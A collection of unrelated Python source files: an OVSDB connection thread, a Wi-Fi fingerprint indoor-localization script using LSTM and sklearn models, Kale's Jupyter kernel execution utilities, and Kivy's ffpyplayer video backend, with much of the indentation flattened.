self.schema_name = schema_name
self.idl_class = idl_class or idl.Idl
self._schema_filter = None
def start(self, table_name_list=None):
"""
:param table_name_list: A list of table names for schema_helper to
register. When this parameter is given, schema_helper will only
register tables which name are in list. Otherwise,
schema_helper will register all tables for given schema_name as
default.
"""
self._schema_filter = table_name_list
with self.lock:
if self.idl is not None:
return
helper = self.get_schema_helper()
self.update_schema_helper(helper)
self.idl = self.idl_class(self.connection, helper)
idlutils.wait_for_change(self.idl, self.timeout)
self.poller = poller.Poller()
self.thread = threading.Thread(target=self.run)
            self.thread.daemon = True
self.thread.start()
def get_schema_helper(self):
"""Retrieve the schema helper object from OVSDB"""
try:
helper = idlutils.get_schema_helper(self.connection,
self.schema_name)
except Exception:
            # We may have failed due to set-manager not being called
helpers.enable_connection_uri(self.connection)
# There is a small window for a race, so retry up to a second
@tenacity.retry(wait=tenacity.wait_exponential(multiplier=0.01),
stop=tenacity.stop_after_delay(1),
reraise=True)
def do_get_schema_helper():
return idlutils.get_schema_helper(self.connection,
self.schema_name)
helper = do_get_schema_helper()
return helper
def update_schema_helper(self, helper):
if self._schema_filter:
for table_name in self._schema_filter:
helper.register_table(table_name)
else:
helper.register_all()
def run(self):
while True:
self.idl.wait(self.poller)
self.poller.fd_wait(self.txns.alert_fileno, poller.POLLIN)
#TODO(jlibosva): Remove next line once losing connection to ovsdb
# is solved.
self.poller.timer_wait(self.timeout * 1000)
self.poller.block()
self.idl.run()
txn = self.txns.get_nowait()
if txn is not None:
try:
txn.results.put(txn.do_commit())
except Exception as ex:
er = idlutils.ExceptionResult(ex=ex,
tb=traceback.format_exc())
txn.results.put(er)
self.txns.task_done()
def queue_txn(self, txn):
self.txns.put(txn)
|
learn1Huella.py
|
#!/usr/bin/python3
import io
import csv
import json
import warnings
import pickle
import operator
import time
import logging
import math
import functools
import numpy
from sklearn.preprocessing import MinMaxScaler
from threading import Thread
from random import shuffle
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn import cluster, mixture
from sklearn.neighbors import kneighbors_graph
from s3_helper import put_file, get_file
# locindoor local libraries
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from tensorflow.keras.models import load_model
from core.data_processor import DataLoader
from core.model import Model
from core.trajectories import Trajectories
from core.aps import Aps
# create the 'learn' logger
logger = logging.getLogger('learn')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('learn.log')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - [%(name)s/%(funcName)s] - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
def timeout(timeout):
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
res = [Exception('function [%s] timeout [%s seconds] exceeded!' % (
func.__name__, timeout))]
def newFunc():
try:
res[0] = func(*args, **kwargs)
except Exception as e:
res[0] = e
t = Thread(target=newFunc)
t.daemon = True
try:
t.start()
t.join(timeout)
except Exception as je:
raise je
ret = res[0]
if isinstance(ret, BaseException):
raise ret
return ret
return wrapper
return deco
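# Illustrative behavior of the decorator above (AI.train below applies
# it as @timeout(10)): the wrapped call runs in a daemon thread; if it
# does not finish within `timeout` seconds, the prepared Exception is
# raised, while the worker thread itself keeps running in the background.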
class AI(object):
def __init__(self, family=None):
self.logger = logging.getLogger('learn.AI')
self.naming = {'from': {}, 'to': {}}
        self.family = family or 'posifi'
def classify(self, sensor_data):
header = self.header[1:]
self.logger.debug(sensor_data)
is_unknown = True
lista_Ap = pd.read_csv("listadomodificado.csv")
        # Filter out detected APs that are not among the training APs
#for sensorType in sensor_data["s"]:
# csv_data = numpy.zeros((len(sensor_data["s"][sensorType]),len(header)))
# for i in range(len(sensor_data["s"][sensorType])-1):
# for sensor in (sensor_data["s"][sensorType][i]):
# sensorName = 'Ap200'
# for j in range (len(lista_Ap)):
# if (lista_Ap['MAC'][j] == sensor):
# sensorName = lista_Ap['nºAp'][j]
# if sensorName in header:
# is_unknown = False
# csv_data[i][header.index(sensorName)] = sensor_data["s"][sensorType][i][sensor]
csv_data = numpy.zeros(len(header))
for sensorType in sensor_data["s"]:
for sensor in (sensor_data["s"][sensorType]):
sensorName = 'Ap200'
for j in range (len(lista_Ap)):
if (lista_Ap['MAC'][j] == sensor):
sensorName = lista_Ap['nºAp'][j]
if sensorName in header:
is_unknown = False
csv_data[header.index(sensorName)] = sensor_data["s"][sensorType][sensor]
self.headerClassify = header
self.csv_dataClassify = csv_data.reshape(1, -1)
#self.csv_dataClassify = csv_data
payload = {'location_names': self.naming['to'], 'predictions': []}
threads = [None]*len(self.algorithms)
self.results = [None]*len(self.algorithms)
for i, alg in enumerate(self.algorithms.keys()):
threads[i] = Thread(target=self.do_classification, args=(i, alg))
threads[i].start()
for i, _ in enumerate(self.algorithms.keys()):
threads[i].join()
for result in self.results:
            if result is not None:
payload['predictions'].append(result)
payload['is_unknown'] = is_unknown
return payload
def do_classification(self, index, name):
t = time.time()
#pasos = np.empty([15,self.csv_dataClassify.shape[1]])
try:
if name == "LSTM":
# for h in range(self.csv_dataClassify.shape[0]):
# self.csv_dataClassify[h][self.csv_dataClassify[h] == 0] = 100
# huella = self.csv_dataClassify[h]
# huella = huella.reshape(36,1)
# min_max_scaler = MinMaxScaler()
# x_scaled = min_max_scaler.fit_transform(huella)
# huella = x_scaled.reshape(1,36)
# pasos[h] = huella
# if pasos.shape == 15:
# pasos = pasos.reshape(1,15,36)
# model_new= load_model('learnfull.h5')
# prediction = model_new.predict(pasos)
# else:
# aux = pasos[0]
# for i in range(15):
# pasos[i]=aux
# pasos = pasos.reshape(1,15,36)
# model_new= load_model('learnfull.h5')
# prediction = model_new.predict(pasos)
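                # Build the LSTM input window: replace missing readings
                # (zeros) with the sentinel value 100, min-max scale the
                # 36-AP fingerprint, then replicate it 15 times to form
                # the (1, 15, 36) sequence the model expects.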
self.csv_dataClassify[self.csv_dataClassify == 0] = 100
huella = self.csv_dataClassify
huella = huella.reshape(huella.shape[1],1)
min_max_scaler = MinMaxScaler()
x_scaled = min_max_scaler.fit_transform(huella)
pasos = np.empty([15,huella.shape[0]])
huella = x_scaled.reshape(1,36)
for i in range(15):
pasos[i] = huella
pasos = pasos.reshape(1,15,36)
model_new= load_model('learnfull.h5')
prediction = model_new.predict(pasos)
self.logger.debug(prediction)
else:
prediction = self.algorithms[name].predict_proba(self.csv_dataClassify)
except Exception as e:
logger.error(self.csv_dataClassify)
logger.error(str(e))
return
predict = {}
if name == "LSTM":
            a = int(prediction[0][14])
prediction = np.zeros([1,90])
for i in range(90):
if (a == i):
prediction[0,i] = 100
for i, pred in enumerate(prediction[0]):
predict[i] = pred
predict_payload = {'name': name,'locations': [], 'probabilities': []}
badValue = False
for tup in sorted(predict.items(), key=operator.itemgetter(1), reverse=True):
predict_payload['locations'].append(str(tup[0]))
predict_payload['probabilities'].append(round(float(tup[1]), 2))
if math.isnan(tup[1]):
badValue = True
break
if badValue:
return
self.results[index] = predict_payload
@timeout(10)
def train(self, clf, x, y):
return clf.fit(x, y)
    def trayecto(self, fname):  # generate the trajectories
configs = json.load(open('config.json', 'r'))
        # Aps class - reads the AP MAC address file and builds a listing
Ap = Aps(os.path.join('data', configs['Aps']['listaAps']))
lista_Aps = Ap.listadoF2(configs)
        # List the Antel APs
lista_antel = Ap.Aps_antel(lista_Aps,os.path.join('data',configs['Aps']['listaAntel']))
        # List the Fing APs
lista_Fing = Ap.Aps_fing(lista_Aps,os.path.join('data',configs['Aps']['listaFing']))
        # Load and process the data
data = DataLoader(fname)
        # 'datos' holds the matrix of collected fingerprints - the desired matrix type is specified in config
datos = data.huellas(configs, lista_antel, lista_Aps)
        # Filter out columns carrying little information
datos = data.filtro_Ap(datos, configs['Aps']['descartamos'],-85)
        # load the data with one random fingerprint per zone
datos_una_huella = data.una_huella_zona(datos)
        # Normalize the RSSI data (zones keep their zone number)
huellas_norm_df = data.normaliza(datos_una_huella)
datos.to_csv('datos.csv', index=False)
        # Generate Trayectorias_aleatorias, a matrix where each row is a trajectory of T steps
        # The number of trajectories to generate and the number of steps are passed as parameters
trayectorias = Trajectories(configs)
mapa = trayectorias.crear_mapa(configs)
Trayectorias_aleatorias = trayectorias.generacion_trayectorias(configs['trajectory']['T'],configs['trajectory']['cantidad'],mapa)
        # Build a 3D matrix where each step of the trajectory is assigned a fingerprint
Matriz_Trayectorias_una_huella = trayectorias.trayectorias_con_una_huella(huellas_norm_df,Trayectorias_aleatorias)
data_train, data_test = trayectorias.train_and_test(Matriz_Trayectorias_una_huella,configs['data']['train_test_split'])
train3D_X, train3D_y = data_train[:,:,:-1], data_train[:,:, -1]
test3D_X, test3D_y = data_test[:,:,:-1], data_test[:,:, -1]
#trainY_coord3D = data.coordenadas(train3D_y)
#testY_coord3D = data.coordenadas(test3D_y)
return train3D_X, test3D_X, train3D_y, test3D_y
def learn(self, fname):
self.model = Model()
t = time.time()
configs = json.load(open('config.json', 'r'))
        # Load the file containing the fingerprints to classify
fname = "HuellasPiso1.csv"
        # generate the trajectories and split them into train and test sets
        train3D_X, test3D_X, train3D_y, test3D_y = self.trayecto(fname)
self.header = []
rows = []
naming_num = 0
with open('../src/datos.csv', 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for i, row in enumerate(reader):
#self.logger.debug(row)
if i == 0:
self.header = row
else:
for j, val in enumerate(row):
if j == 36:
                            # this is the name of the location
if val not in self.naming['from']:
self.naming['from'][val] = naming_num
valor = str(int(float(val)))
#self.naming['to'][naming_num] = "location" + "_" + valor
self.naming['to'][naming_num] = valor
naming_num += 1
row[j] = self.naming['from'][val]
continue
if val == '':
row[j] = 0
continue
try:
row[j] = float(val)
except:
self.logger.error(
"problem parsing value " + str(val))
rows.append(row)
# first column in row is the classification, Y
y = numpy.zeros(len(rows))
x = numpy.zeros((len(rows), len(rows[0]) - 1))
# shuffle it up for training
record_range = list(range(len(rows)))
shuffle(record_range)
for i in record_range:
y[i] = rows[i][0]
x[i, :] = numpy.array(rows[i][1:])
names = [
"LSTM"]
#"Linear SVM"]
classifiers = [
self.model.model_clas(configs)]
#SVC(kernel="linear", C=0.025, probability=True)]
self.algorithms = {}
for name, clf in zip(names, classifiers):
t2 = time.time()
self.logger.debug("learning {}".format(name))
try:
if name == "LSTM":
self.algorithms[name] = self.model.train(train3D_X, train3D_y,epochs = 5,batch_size = 10,verbose=2,shuffle=True)
self.model.save()
else:
self.algorithms[name] = self.train(clf, x, y)
# self.logger.debug("learned {}, {:d} ms".format(name, int(1000 * (t2 - time.time()))))
except Exception as e:
self.logger.error("{} {}".format(name, str(e)))
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def save(self, save_file):
t = time.time()
save_data = {
'header': self.header,
'naming': self.naming,
'algorithms': self.algorithms,
'family': self.family
}
save_data = pickle.dumps(save_data)
put_file(f'ai_metadata/{save_file}', save_data)
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def load(self, save_file):
t = time.time()
downloaded_data = get_file(f'ai_metadata/{save_file}')
if not downloaded_data:
raise Exception('There is no AI data on S3')
saved_data = pickle.loads(downloaded_data)
self.header = saved_data['header']
self.naming = saved_data['naming']
self.algorithms = saved_data['algorithms']
self.family = saved_data['family']
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def do():
ai = AI()
ai.load()
# ai.learn()
params = {'quantile': .3,
'eps': .3,
'damping': .9,
'preference': -200,
'n_neighbors': 10,
'n_clusters': 3}
bandwidth = cluster.estimate_bandwidth(ai.x, quantile=params['quantile'])
connectivity = kneighbors_graph(
ai.x, n_neighbors=params['n_neighbors'], include_self=False)
# make connectivity symmetric
connectivity = 0.5 * (connectivity + connectivity.T)
ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
two_means = cluster.MiniBatchKMeans(n_clusters=params['n_clusters'])
ward = cluster.AgglomerativeClustering(
n_clusters=params['n_clusters'], linkage='ward',
connectivity=connectivity)
spectral = cluster.SpectralClustering(
n_clusters=params['n_clusters'], eigen_solver='arpack',
affinity="nearest_neighbors")
dbscan = cluster.DBSCAN(eps=params['eps'])
affinity_propagation = cluster.AffinityPropagation(
damping=params['damping'], preference=params['preference'])
average_linkage = cluster.AgglomerativeClustering(
linkage="average", affinity="cityblock",
n_clusters=params['n_clusters'], connectivity=connectivity)
birch = cluster.Birch(n_clusters=params['n_clusters'])
gmm = mixture.GaussianMixture(
n_components=params['n_clusters'], covariance_type='full')
clustering_algorithms = (
('MiniBatchKMeans', two_means),
('AffinityPropagation', affinity_propagation),
('MeanShift', ms),
('SpectralClustering', spectral),
('Ward', ward),
('AgglomerativeClustering', average_linkage),
('DBSCAN', dbscan),
('Birch', birch),
('GaussianMixture', gmm)
)
for name, algorithm in clustering_algorithms:
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore",
message="the number of connected components of the " +
"connectivity matrix is [0-9]{1,2}" +
" > 1. Completing it to avoid stopping the tree early.",
category=UserWarning)
warnings.filterwarnings(
"ignore",
message="Graph is not fully connected, spectral embedding" +
" may not work as expected.",
category=UserWarning)
try:
algorithm.fit(ai.x)
except Exception as e:
continue
if hasattr(algorithm, 'labels_'):
            y_pred = algorithm.labels_.astype(int)
else:
y_pred = algorithm.predict(ai.x)
if max(y_pred) > 3:
continue
known_groups = {}
for i, group in enumerate(ai.y):
group = int(group)
if group not in known_groups:
known_groups[group] = []
known_groups[group].append(i)
guessed_groups = {}
for i, group in enumerate(y_pred):
if group not in guessed_groups:
guessed_groups[group] = []
guessed_groups[group].append(i)
for k in known_groups:
for g in guessed_groups:
print(
k, g, len(set(known_groups[k]).intersection(guessed_groups[g])))
|
jupyter_utils.py
|
# Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import json
import time
import signal
import nbformat
import threading
from queue import Empty
from kale.utils import pod_utils
from jupyter_client.kernelspec import get_kernel_spec
from kale.utils.utils import remove_ansi_color_sequences
from nbconvert.preprocessors.execute import ExecutePreprocessor
from packaging import version as pkg_version
html_template = '''
<html><head>
<style>
table {
border: none;
border-collapse: collapse;
border-spacing: 0;
font-size: 14px;
}
td,
th {
text-align: right;
vertical-align: middle;
padding: 0.5em 0.5em;
line-height: 1.0;
white-space: nowrap;
max-width: 100px;
text-overflow: ellipsis;
overflow: hidden;
border: none;
}
th {
font-weight: bold;
}
tbody tr:nth-child(odd) {
background: rgb(245, 245, 245);
}
</style>
</head>
<body><div>
%s
</div></body>
</html>
'''
image_html_template = '''
<div>
<p>{}</p>
<img src="data:image/png;base64, {}" />
</div>
'''
text_html_template = '''
<pre>
------- CELL OUTPUT -------
{}
---------------------------
</pre>
<br><br>
'''
javascript_html_template = '''
<script>
{}
</script>
'''
class KaleKernelException(Exception):
"""Raised when signal_handler receives a signal from capture_streams."""
pass
def generate_html_output(outputs):
"""Transform a notebook cell rich outputs into a html page.
Args:
outputs: notebook cell output
Returns: html multiline string
"""
if not isinstance(outputs, list):
raise ValueError("A notebook's cell outputs must be a valid list."
" Found {} instead.".format(type(outputs)))
html_body = ""
# run through the list of outputs
for o in outputs:
        # the only rich outputs should come from `display_data` and
        # `execute_result` messages. The latter are identical to
        # `display_data` messages, with the addition of an execution_count key.
output_type = o.get('output_type', None)
if not output_type:
            raise ValueError("Cell output dict has no `output_type` field."
" Output: {}".format(o))
if o['output_type'] in ['display_data', 'execute_result']:
# check mime-type of content
# Currently supported MIME types:
# see: https://ipython.org/ipython-doc/2/api/generated/IPython.core.displaypub.html#IPython.core.displaypub.DisplayPublisher
# text / plain
# text / html
# text / markdown
# text / latex
# application / json
# application / javascript
# image / png
# image / jpeg
# image / svg + xml
data = o['data']
# TODO: Generalize to multiple image types (i.e. jpeg and svg+xml)
if 'image/png' in data:
title = data.get('text/plain', '')
html = image_html_template.format(title, data['image/png'])
html_body += html
if 'text/html' in data:
html_body += data['text/html']
if ('image/png' not in data
and 'text/html' not in data
and 'text/plain' in data):
html_body += text_html_template.format(data['text/plain'])
if 'application/javascript' in data:
html_body += javascript_html_template.format(
data['application/javascript'])
return html_body
def update_uimetadata(artifact_name,
uimetadata_path='/mlpipeline-ui-metadata.json'):
"""Update ui-metadata dictionary with a new web-app entry.
Args:
artifact_name: Name of the artifact
uimetadata_path: path to mlpipeline-ui-metadata.json
"""
# Default empty ui-metadata dict
outputs = {"outputs": []}
if os.path.exists(uimetadata_path):
try:
outputs = json.loads(
open(uimetadata_path, 'r').read())
if not outputs.get('outputs', None):
outputs['outputs'] = []
except json.JSONDecodeError as e:
print("Failed to parse json file {}: {}\n"
"This step will not be able to visualize artifacts in the"
" KFP UI".format(uimetadata_path, e))
pod_name = pod_utils.get_pod_name()
namespace = pod_utils.get_namespace()
workflow_name = pod_utils.get_workflow_name(pod_name, namespace)
html_artifact_entry = [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/{}/{}/{}'.format(
workflow_name, pod_name, artifact_name + '.tgz')
}]
outputs['outputs'] += html_artifact_entry
with open(uimetadata_path, "w") as f:
json.dump(outputs, f)
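# Illustrative resulting entry (hypothetical names): calling
# update_uimetadata('report') appends something like
#   {"type": "web-app", "storage": "minio",
#    "source": "minio://mlpipeline/artifacts/<workflow>/<pod>/report.tgz"}
# to the "outputs" list in /mlpipeline-ui-metadata.json.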
def process_outputs(cells):
"""Process a list of cells outputs after execution."""
html_outputs = [generate_html_output(c.outputs)
for c in cells]
html_outputs = '\n'.join(html_outputs).strip()
if html_outputs == "":
html_outputs = "This step did not produce any artifacts."
html_artifact = html_template % html_outputs
return html_artifact
def capture_streams(kc, exit_on_error=False):
"""Capture stream and error outputs from a kernel connection.
Get messages from the iopub channel of the `kc` kernel connection
and write to stdout or stderr any message of type `stream`.
Capture and exit when receiving an `error` message or when the message
queue is done.
Args:
kc: kernel connection
exit_on_error (bool): True to call sys.exit() when the kernel sends
an error message.
"""
while True:
try:
msg = kc.iopub_channel.get_msg()
except Empty:
print("The Kale kernel stream watcher thread raised an Empty"
" exception, exiting...")
return
msg_type = msg['header']['msg_type']
content = msg['content']
if msg_type == 'stream': # stdout or stderr
if content['name'] == 'stdout':
sys.stdout.write(content['text'])
elif content['name'] == 'stderr':
sys.stderr.write(content['text'])
else:
raise NotImplementedError("stream message content name not"
" recognized: {}"
.format(content['name']))
if msg_type == 'error': # error and exceptions
# traceback is a list of strings (jupyter protocol spec)
traceback = map(remove_ansi_color_sequences,
content['traceback'])
sys.stderr.write('\n'.join(traceback) + '\n')
if exit_on_error:
# when receiving an error from the kernel, we don't want
# to just print the exception to stderr, otherwise the
# pipeline step would complete successfully.
# kill sends the signal to the specific pid (main thread)
os.kill(os.getpid(), signal.SIGUSR1)
def run_code(source: tuple, kernel_name='python3'):
"""Run code blocks inside a jupyter kernel.
Args:
source (tuple): source code blocks
kernel_name: name of the kernel (form the kernel spec) to be created
"""
import IPython
if pkg_version.parse(IPython.__version__) < pkg_version.parse('7.6.0'):
raise RuntimeError("IPython version {} not supported."
" Kale requires at least version 7.6.0."
.format(IPython.__version__))
# new notebook
spec = get_kernel_spec(kernel_name)
notebook = nbformat.v4.new_notebook(metadata={
'kernelspec': {
'display_name': spec.display_name,
'language': spec.language,
'name': kernel_name,
}})
notebook.cells = [nbformat.v4.new_code_cell(s) for s in source]
# these parameters are passed to nbconvert.ExecutePreprocessor
jupyter_execute_kwargs = dict(
timeout=-1, allow_errors=True, store_widget_state=True)
resources = {}
# cwd: If supplied, the kernel will run in this directory
# resources['metadata'] = {'path': cwd}
ep = ExecutePreprocessor(**jupyter_execute_kwargs)
km = ep.kernel_manager_class(kernel_name=kernel_name, config=ep.config)
# start_kernel supports several additional arguments via **kw
km.start_kernel(extra_arguments=ep.extra_arguments)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=60)
except RuntimeError:
kc.stop_channels()
raise
kc.allow_stdin = False
def signal_handler(_signal, _frame):
raise KaleKernelException()
# this signal is used by the thread in case an error message is received
# by the kernel. Running sys.exit() inside the thread would terminate
# just the thread itself, not the main process. Calling os._exit() can be
# dangerous as the process is killed instantly (files and connections are
# not closed, for example). With a signal we can capture the ExitCommand
# exception from the main process and exit gracefully.
signal.signal(signal.SIGUSR1, signal_handler)
# start separate thread in to capture and print stdout, stderr, errors.
# daemon mode will make the watcher thread die when the main one returns.
x = threading.Thread(target=capture_streams, args=(kc, True,), daemon=True)
x.start()
try:
# start preprocessor: run each code cell and capture the output
ep.preprocess(notebook, resources, km=km)
except KaleKernelException:
# exit gracefully with error
sys.exit(-1)
# Give some time to the stream watcher thread to receive all messages from
# the kernel before shutting down.
time.sleep(1)
km.shutdown_kernel()
result = process_outputs(notebook.cells)
return result
|
video_ffpyplayer.py
|
'''
FFmpeg based video abstraction
==============================
To use, you need to install ffpyplayer and have a compiled ffmpeg shared
library.
https://github.com/matham/ffpyplayer
The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here are some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL2.
Now, you should have ffmpeg and sdl directories. In each, you should have an
'include', 'bin' and 'lib' directory, where e.g. for Windows, 'lib' contains
the .dll.a files, while 'bin' contains the actual dlls. The 'include' directory
holds the headers. The 'bin' directory is only needed if the shared libraries
are not already in the path. In the environment, define FFMPEG_ROOT and
SDL_ROOT, each pointing to the ffmpeg and SDL directories respectively. (If
you're using SDL2, the 'include' directory will contain an 'SDL2' directory,
which then holds the headers).
Once defined, download the ffpyplayer git repo and run
python setup.py build_ext --inplace
Finally, before running you need to ensure that ffpyplayer is in python's path.
.. note::
    When kivy exits by closing the window while the video is playing,
    it appears that the __del__ method of VideoFFPy
is not called. Because of this, the VideoFFPy object is not
properly deleted when kivy exits. The consequence is that because
MediaPlayer creates internal threads which do not have their daemon
    flag set, when the main thread exits, it'll hang and wait for the other
MediaPlayer threads to exit. But since __del__ is not called to delete the
MediaPlayer object, those threads will remain alive, hanging kivy. What
this means is that you have to be sure to delete the MediaPlayer object
before kivy exits by setting it to None.
'''
__all__ = ('VideoFFPy', )
try:
import ffpyplayer
from ffpyplayer.player import MediaPlayer
from ffpyplayer.tools import set_log_callback, get_log_callback
except:
raise
from threading import Thread
from kivy.clock import Clock, mainthread
from kivy.logger import Logger
from kivy.core.video import VideoBase
from kivy.graphics import Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.graphics.fbo import Fbo
from kivy.weakmethod import WeakMethod
import time
Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version))
logger_func = {'quiet': Logger.critical, 'panic': Logger.critical,
'fatal': Logger.critical, 'error': Logger.error,
'warning': Logger.warning, 'info': Logger.info,
'verbose': Logger.debug, 'debug': Logger.debug}
def _log_callback(message, level):
message = message.strip()
if message:
logger_func[level]('ffpyplayer: {}'.format(message))
if not get_log_callback():
set_log_callback(_log_callback)
class VideoFFPy(VideoBase):
YUV_RGB_FS = """
$HEADER$
uniform sampler2D tex_y;
uniform sampler2D tex_u;
uniform sampler2D tex_v;
void main(void) {
float y = texture2D(tex_y, tex_coord0).r;
float u = texture2D(tex_u, tex_coord0).r - 0.5;
float v = texture2D(tex_v, tex_coord0).r - 0.5;
float r = y + 1.402 * v;
float g = y - 0.344 * u - 0.714 * v;
float b = y + 1.772 * u;
gl_FragColor = vec4(r, g, b, 1.0);
}
"""
_trigger = None
def __init__(self, **kwargs):
self._ffplayer = None
self._thread = None
self._next_frame = None
self._seek_queue = []
self._ffplayer_need_quit = False
self._trigger = Clock.create_trigger(self._redraw)
super(VideoFFPy, self).__init__(**kwargs)
def __del__(self):
self.unload()
def _player_callback(self, selector, value):
if self._ffplayer is None:
return
if selector == 'quit':
def close(*args):
self.unload()
Clock.schedule_once(close, 0)
def _get_position(self):
if self._ffplayer is not None:
return self._ffplayer.get_pts()
return 0
def _set_position(self, pos):
self.seek(pos)
def _set_volume(self, volume):
self._volume = volume
if self._ffplayer:
self._ffplayer.set_volume(self._volume)
def _get_duration(self):
if self._ffplayer is None:
return 0
return self._ffplayer.get_metadata()['duration']
@mainthread
def _do_eos(self):
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.dispatch('on_eos')
@mainthread
def _change_state(self, state):
self._state = state
def _redraw(self, *args):
if not self._ffplayer:
return
next_frame = self._next_frame
if not next_frame:
return
img, pts = next_frame
if img.get_size() != self._size or self._texture is None:
self._size = w, h = img.get_size()
if self._out_fmt == 'yuv420p':
w2 = int(w / 2)
h2 = int(h / 2)
self._tex_y = Texture.create(
size=(w, h), colorfmt='luminance')
self._tex_u = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._tex_v = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._fbo = fbo = Fbo(size=self._size)
with fbo:
BindTexture(texture=self._tex_u, index=1)
BindTexture(texture=self._tex_v, index=2)
Rectangle(size=fbo.size, texture=self._tex_y)
fbo.shader.fs = VideoFFPy.YUV_RGB_FS
fbo['tex_y'] = 0
fbo['tex_u'] = 1
fbo['tex_v'] = 2
self._texture = fbo.texture
else:
self._texture = Texture.create(size=self._size,
colorfmt='rgba')
# XXX FIXME
# self.texture.add_reload_observer(self.reload_buffer)
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
if self._out_fmt == 'yuv420p':
dy, du, dv, _ = img.to_memoryview()
if dy and du and dv:
self._tex_y.blit_buffer(dy, colorfmt='luminance')
self._tex_u.blit_buffer(du, colorfmt='luminance')
self._tex_v.blit_buffer(dv, colorfmt='luminance')
self._fbo.ask_update()
self._fbo.draw()
else:
self._texture.blit_buffer(
img.to_memoryview()[0], colorfmt='rgba')
self.dispatch('on_frame')
def _next_frame_run(self):
ffplayer = self._ffplayer
sleep = time.sleep
trigger = self._trigger
did_dispatch_eof = False
seek_queue = self._seek_queue
# fast path, if the source video is yuv420p, we'll use a glsl shader
# for buffer conversion to rgba
while not self._ffplayer_need_quit:
src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt')
if not src_pix_fmt:
sleep(0.005)
continue
if src_pix_fmt == 'yuv420p':
self._out_fmt = 'yuv420p'
ffplayer.set_output_pix_fmt(self._out_fmt)
self._ffplayer.toggle_pause()
break
if self._ffplayer_need_quit:
return
# wait until loaded or failed, shouldn't take long, but just to make
# sure metadata is available.
        s = time.perf_counter()
while not self._ffplayer_need_quit:
if ffplayer.get_metadata()['src_vid_size'] != (0, 0):
break
# XXX if will fail later then?
            if time.perf_counter() - s > 10.:
break
sleep(0.005)
if self._ffplayer_need_quit:
return
        # we have all the information, now get the frames :)
self._change_state('playing')
while not self._ffplayer_need_quit:
if seek_queue:
vals = seek_queue[:]
del seek_queue[:len(vals)]
ffplayer.seek(
vals[-1] * ffplayer.get_metadata()['duration'],
relative=False)
self._next_frame = None
t1 = time.time()
frame, val = ffplayer.get_frame()
t2 = time.time()
if val == 'eof':
sleep(0.2)
if not did_dispatch_eof:
self._do_eos()
did_dispatch_eof = True
elif val == 'paused':
did_dispatch_eof = False
sleep(0.2)
else:
did_dispatch_eof = False
if frame:
self._next_frame = frame
trigger()
else:
val = val if val else (1 / 30.)
sleep(val)
def seek(self, percent):
if self._ffplayer is None:
return
self._seek_queue.append(percent)
def stop(self):
self.unload()
def pause(self):
if self._ffplayer and self._state != 'paused':
self._ffplayer.toggle_pause()
self._state = 'paused'
def play(self):
if self._ffplayer and self._state == 'paused':
self._ffplayer.toggle_pause()
self._state = 'playing'
return
self.load()
self._out_fmt = 'rgba'
ff_opts = {
'paused': True,
'out_fmt': self._out_fmt
}
self._ffplayer = MediaPlayer(
self._filename, callback=self._player_callback,
thread_lib='SDL',
loglevel='info', ff_opts=ff_opts)
self._ffplayer.set_volume(self._volume)
self._thread = Thread(target=self._next_frame_run, name='Next frame')
self._thread.daemon = True
self._thread.start()
def load(self):
self.unload()
def unload(self):
if self._trigger is not None:
self._trigger.cancel()
self._ffplayer_need_quit = True
if self._thread:
self._thread.join()
self._thread = None
if self._ffplayer:
self._ffplayer = None
self._next_frame = None
self._size = (0, 0)
self._state = ''
self._ffplayer_need_quit = False